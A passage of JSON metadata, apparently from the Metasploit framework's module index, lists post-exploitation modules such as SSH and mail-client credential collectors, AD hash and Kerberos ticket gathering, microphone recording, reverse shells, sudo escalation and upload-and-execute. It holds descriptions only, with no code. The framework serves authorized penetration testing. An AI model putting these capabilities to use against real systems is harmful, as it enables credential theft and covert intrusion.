"name": "SaltStack Salt Information Gatherer", - "fullname": "post/multi/gather/saltstack_salt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "c2Vlcgo" - ], - "description": "This module gathers information from SaltStack Salt masters and minions.\n Data gathered from minions: 1. salt minion config file\n Data gathered from masters: 1. minion list (denied, pre, rejected, accepted)\n 2. minion hostname/ip/os (depending on module settings)\n 3. SLS\n 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed\n 5. minion config files\n 6. pillar data", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/multi/gather/saltstack_salt.rb", - "is_install_path": true, - "ref_name": "multi/gather/saltstack_salt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/skype_enum": { - "name": "Multi Gather Skype User Data Enumeration", - "fullname": "post/multi/gather/skype_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.", - "references": [], - "platform": "OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/skype_enum.rb", - "is_install_path": true, - "ref_name": "multi/gather/skype_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ssh_creds": { - "name": "Multi Gather OpenSSH PKI Credentials Collection", - "fullname": "post/multi/gather/ssh_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jim Halfpenny" - ], - "description": "This module will collect the contents of all users' .ssh directories on the targeted\n machine. Additionally, known_hosts and authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ssh_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/ssh_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/thunderbird_creds": { - "name": "Multi Gather Mozilla Thunderbird Signon Credential Collection", - "fullname": "post/multi/gather/thunderbird_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/thunderbird_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/thunderbird_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/tomcat_gather": { - "name": "Gather Tomcat Credentials", - "fullname": "post/multi/gather/tomcat_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe " - ], - "description": "This module will attempt to collect credentials from Tomcat services running on the machine.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/tomcat_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/tomcat_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ubiquiti_unifi_backup": { - "name": "Multi Gather Ubiquiti UniFi Controller Backup", - "fullname": "post/multi/gather/ubiquiti_unifi_backup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "zhangyoufu", - "justingist" - ], - "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.", - "references": [ - "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/", - "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1", - "URL-https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation", - "URL-https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105" - ], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb", - "is_install_path": true, - "ref_name": "multi/gather/ubiquiti_unifi_backup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/unix_cached_ad_hashes": { - "name": "UNIX Gather Cached AD Hashes", - "fullname": "post/multi/gather/unix_cached_ad_hashes", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tim Brown " - ], - "description": "Post Module to obtain all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR).", - "references": [], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb", - "is_install_path": true, - "ref_name": "multi/gather/unix_cached_ad_hashes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/unix_kerberos_tickets": { - "name": "UNIX Gather Kerberos Tickets", - "fullname": "post/multi/gather/unix_kerberos_tickets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tim Brown " - ], - "description": "Post Module to obtain all kerberos tickets on the targeted UNIX machine.", - "references": [], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/unix_kerberos_tickets.rb", - "is_install_path": true, - "ref_name": "multi/gather/unix_kerberos_tickets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/wlan_geolocate": { - "name": "Multiplatform WLAN Enumeration and Geolocation", - "fullname": "post/multi/gather/wlan_geolocate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": "Enumerate wireless networks visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.", - "references": [], - "platform": "Android,BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/wlan_geolocate.rb", - "is_install_path": true, - "ref_name": "multi/gather/wlan_geolocate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/wowza_streaming_engine_creds": { - "name": "Gather Wowza Streaming Engine Credentials", - "fullname": "post/multi/gather/wowza_streaming_engine_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module collects Wowza Streaming Engine user credentials.", - "references": [ - "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api", - "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/wowza_streaming_engine_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/close": { - "name": "Multi Generic Operating System Session Close", - "fullname": "post/multi/general/close", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module closes the specified session. This can be useful as a finisher for automation tasks.", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/general/close.rb", - "is_install_path": true, - "ref_name": "multi/general/close", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/execute": { - "name": "Multi Generic Operating System Session Command Execution", - "fullname": "post/multi/general/execute", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module executes an arbitrary command line", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/general/execute.rb", - "is_install_path": true, - "ref_name": "multi/general/execute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/wall": { - "name": "Write Messages to Users", - "fullname": "post/multi/general/wall", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.", - "references": [], - "platform": "Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/general/wall.rb", - "is_install_path": true, - "ref_name": "multi/general/wall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/autoroute": { - "name": "Multi Manage Network Route via Meterpreter Session", - "fullname": "post/multi/manage/autoroute", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "todb ", - "Josh Hale \"sn0wfa11\" " - ], - "description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. See documentation for more\n 'info -d' and click 'Knowledge Base'", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/autoroute.rb", - "is_install_path": true, - "ref_name": "multi/manage/autoroute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/dbvis_add_db_admin": { - "name": "Multi Manage DbVisualizer Add Db Admin", - "fullname": "post/multi/manage/dbvis_add_db_admin", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. Note: This module currently only supports MySQL.", - "references": [ - "URL-http://youtu.be/0LCLRVHX1vA" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", - "is_install_path": true, - "ref_name": "multi/manage/dbvis_add_db_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/dbvis_query": { - "name": "Multi Manage DbVisualizer Query", - "fullname": "post/multi/manage/dbvis_query", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to query and will store the\n results.\n\n Please note: backslash quotes and your (stacked or not) queries should\n end with a semicolon.", - "references": [ - "URL-http://youtu.be/0LCLRVHX1vA" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/dbvis_query.rb", - "is_install_path": true, - "ref_name": "multi/manage/dbvis_query", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/fileshare": { - "name": "Browse the session filesystem in a Web Browser", - "fullname": "post/multi/manage/fileshare", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module allows you to browse the session filesystem via a local\n browser window.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-10-25 17:19:45 +0000", - "path": "/modules/post/multi/manage/fileshare.rb", - "is_install_path": true, - "ref_name": "multi/manage/fileshare", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "SideEffects": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/hsts_eraser": { - "name": "Web browsers HSTS entries eraser", - "fullname": "post/multi/manage/hsts_eraser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sheila A. Berta (UnaPibaGeek)" - ], - "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.", - "references": [ - "URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html", - "URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/hsts_eraser.rb", - "is_install_path": true, - "ref_name": "multi/manage/hsts_eraser", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/multi_post": { - "name": "Multi Manage Post Module Macro Execution", - "fullname": "post/multi/manage/multi_post", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "carlos_perez " - ], - "description": "This module will execute a list of modules given in a macro file in the format\n of against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/multi_post.rb", - "is_install_path": true, - "ref_name": "multi/manage/multi_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/open": { - "name": "Open a file or URL on the target computer", - "fullname": "post/multi/manage/open", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Eliott Teissonniere" - ], - "description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/open.rb", - "is_install_path": true, - "ref_name": "multi/manage/open", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/play_youtube": { - "name": "Multi Manage YouTube Broadcast", - "fullname": "post/multi/manage/play_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.", - "references": [], - "platform": "Android,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/play_youtube.rb", - "is_install_path": true, - "ref_name": "multi/manage/play_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "audio-effects", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/record_mic": { - "name": "Multi Manage Record Microphone", - "fullname": "post/multi/manage/record_mic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/record_mic.rb", - "is_install_path": true, - "ref_name": "multi/manage/record_mic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/screensaver": { - "name": "Multi Manage the screensaver of the target computer", - "fullname": "post/multi/manage/screensaver", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "Eliott Teissonniere", - "Julien Voisin" - ], - "description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.", - "references": [ - "URL-https://gitlab.gnome.org/GNOME/gnome-shell/-/issues/7530" - ], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/manage/screensaver.rb", - "is_install_path": true, - "ref_name": "multi/manage/screensaver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LOCK", - "description": "Lock the current session" - }, - { - "name": "START", - "description": "Start the screensaver, may lock the current session" - }, - { - "name": "STOP", - "description": "Stop the screensaver, user may be prompted for its password" - }, - { - "name": "UNLOCK", - "description": "Unlock the current session" - } - ] - }, - "post_multi/manage/screenshare": { - "name": "Multi Manage the screen of the target meterpreter session", - "fullname": "post/multi/manage/screenshare", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module allows you to view and control the screen of the target computer via\n a local browser window. The module continually screenshots the target screen and\n also relays all mouse and keyboard events to session.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-09-23 15:03:19 +0000", - "path": "/modules/post/multi/manage/screenshare.rb", - "is_install_path": true, - "ref_name": "multi/manage/screenshare", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/set_wallpaper": { - "name": "Multi Manage Set Wallpaper", - "fullname": "post/multi/manage/set_wallpaper", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.", - "references": [], - "platform": "Android,Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/set_wallpaper.rb", - "is_install_path": true, - "ref_name": "multi/manage/set_wallpaper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/shell_to_meterpreter": { - "name": "Shell to Meterpreter Upgrade", - "fullname": "post/multi/manage/shell_to_meterpreter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": "This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", - "is_install_path": true, - "ref_name": "multi/manage/shell_to_meterpreter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/sudo": { - "name": "Multiple Linux / Unix Post Sudo Upgrade Shell", - "fullname": "post/multi/manage/sudo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "todb ", - "Ryan Baxendale " - ], - "description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.", - "references": [ - "URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h" - ], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/sudo.rb", - "is_install_path": true, - "ref_name": "multi/manage/sudo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "account-lockouts" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_multi/manage/system_session": { - "name": "Multi Manage System Remote TCP Shell Session", - "fullname": "post/multi/manage/system_session", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.", - "references": [], - "platform": "Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/system_session.rb", - "is_install_path": true, - "ref_name": "multi/manage/system_session", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/upload_exec": { - "name": "Upload and Execute", - "fullname": "post/multi/manage/upload_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "egypt " - ], - "description": "Push a file and execute it.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/upload_exec.rb", - "is_install_path": true, - "ref_name": "multi/manage/upload_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_multi/manage/zip": { - "name": "Multi Manage File Compressor", - "fullname": "post/multi/manage/zip", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. If not, it falls\n back to its Windows Scripting Host.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/zip.rb", - "is_install_path": true, - "ref_name": "multi/manage/zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/local_exploit_suggester": { - "name": "Multi Recon Local Exploit Suggester", - "fullname": "post/multi/recon/local_exploit_suggester", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r ", - "Mo" - ], - "description": "This module suggests local Metasploit exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.", - "references": [], - "platform": 